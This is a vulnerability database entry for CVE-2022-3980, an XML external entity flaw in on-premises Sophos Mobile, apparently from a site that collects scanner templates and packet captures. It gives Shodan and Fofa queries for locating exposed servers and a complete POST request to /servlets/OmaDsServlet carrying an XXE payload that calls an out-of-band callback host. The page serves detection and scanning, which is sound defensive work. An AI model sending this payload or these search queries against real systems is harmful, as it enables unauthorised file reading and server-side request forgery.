🔙 목록으로 돌아가기

CVE-2022-3980: Sophos Mobile managed on-premises - XML External Entity Injection

TitleSophos Mobile managed on-premises - XML External Entity Injection
Authordabla
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
RemediationApply the latest security patches or updates provided by Sophos to mitigate the vulnerability.
CVSS Score9.8
EPSS Score0.86806
CVE IDCVE-2022-3980
CWE IDCWE-611
Shodan Queryhttp.favicon.hash:-1274798165http.title:"sophos mobile"
Fofa Querytitle="Sophos Mobile"icon_hash=-1274798165title="sophos mobile"
Tags cve cve2022 xxe ssrf sophos vkev vuln

🔍 Vulnerability Description

An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.

🌐 HTTP Request

POST /servlets/OmaDsServlet HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 139
Content-Type: "application/xml"
Accept-Encoding: gzip

<?xml version="1.0"?>

<!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://d5jmpk9le0o4s07danp0zyjpszf83zau8.oast.site">%test;]>

<cdl>test</cdl>

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3980.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-3980.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A